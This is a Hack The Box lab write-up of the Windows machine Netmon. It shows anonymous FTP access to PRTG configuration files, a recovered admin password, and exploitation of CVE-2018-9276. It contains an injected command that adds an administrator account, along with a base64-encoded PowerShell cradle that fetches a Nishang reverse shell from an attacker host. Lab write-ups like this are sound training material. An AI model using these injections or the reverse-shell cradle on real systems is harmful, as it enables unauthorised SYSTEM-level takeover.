Netmon
Netmon
Netmon
Netmon
18th May 2019 / Document No D19.100.28
Prepared By: MinatoTW
Machine Author: mrb3n
Difficulty: Easy
Classification: Official
Page 1 / 11
SYNOPSIS
Netmon is an easy difficulty Windows box with simple enumeration and exploitation. PRTG is
running, and an FTP server with anonymous access allows reading of PRTG Network Monitor
configuration files. The version of PRTG is vulnerable to RCE which can be exploited to gain a
SYSTEM shell.
● Enumeration ● CVE-2018-9276
Page 2 / 11
ENUMERATION
NMAP
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.152 | grep ^[0-9] | cut -d
'/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.152
FTP is open with anonymous access allowed. The whole C: drive looks mounted on it. PRTG
Network Monitor is running on the web server at port 80 among other common ports.
Page 3 / 11
FTP
Logging into FTP as anonymous we find the user flag in Public folder.
On checking the installed software we find PRTG Network Monitor, which we came across earlier.
A quick google search yields this information. According to it PRTG stores configuration files in
C:\ProgramData\Paessler.
Page 4 / 11
Going into the folder we find the configuration files. According to the documentation "PRTG
Configuration.dat" and "PRTG Configuration.old" are standard files. However there’s no mention
of "PRTG Configuration.dat.bak".
Page 5 / 11
Scrolling down a bit we find the password for user prtgadmin.
PRTG NETWORK MONITOR
Using the credentials prtgadmin / PrTg@dmin2018 we can now login to the page.
However the credentials refuse to work. Maybe the password was changed from the old
configuration. Let’s follow the pattern and try "PrTg@dmin2019" as the password.
Page 6 / 11
Page 7 / 11
FOOTHOLD
A Google search about the vulnerabilities yields a CVE for versions < 18.1.39 (CVE-2018-9276).
According to this article, RCE can be achieved while triggering notifications. Let’s try exploiting it.
The software by default runs as SYSTEM.
Page 8 / 11
Leave the default fields as they are and scroll down to the "Execute Program" section. We can
add a user to Administrators group using this command:
abc.txt | net user htb abc123! /add ; net localgroup administrators htb
/add
Now on the extreme right of your notification name, click on the edit icon and then the bell icon
to trigger it.
Page 9 / 11
psexec.py htb:'abc123!'@10.10.10.152
ALTERNATE WAY
In case we don’t want to add a user, for better OPSEC we can get a reverse shell. However due
to HTML encoding many characters get encoded. We can bypass this using powershell base64
execution.
We need to create a base64 encoded command. However, it should be in the encoding which
WIndows uses i.e UTF-16LE.
echo -n "IEX(new-object
net.webclient).downloadstring('http://10.10.16.32/Invoke-PowerShellTcp.ps1'
)" | iconv -t UTF-16LE | base64 -w0
We use iconv to convert it to target encoding and will execute this reverse shell from Nishang.
Download the script and echo in the command to the last line.
Page 10 / 11
Now start a simple HTTP server and create a new notification. This time the parameter would be,
abc.txt | powershell -enc
SQBFAFgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA
pAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuAD
EAMAAuADEANgAuADMAMgAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAc
AAuAHAAcwAxACcAKQA=
python3 -m http.server 80
And trigger it.
And we have a SYSTEM shell.
Page 11 / 11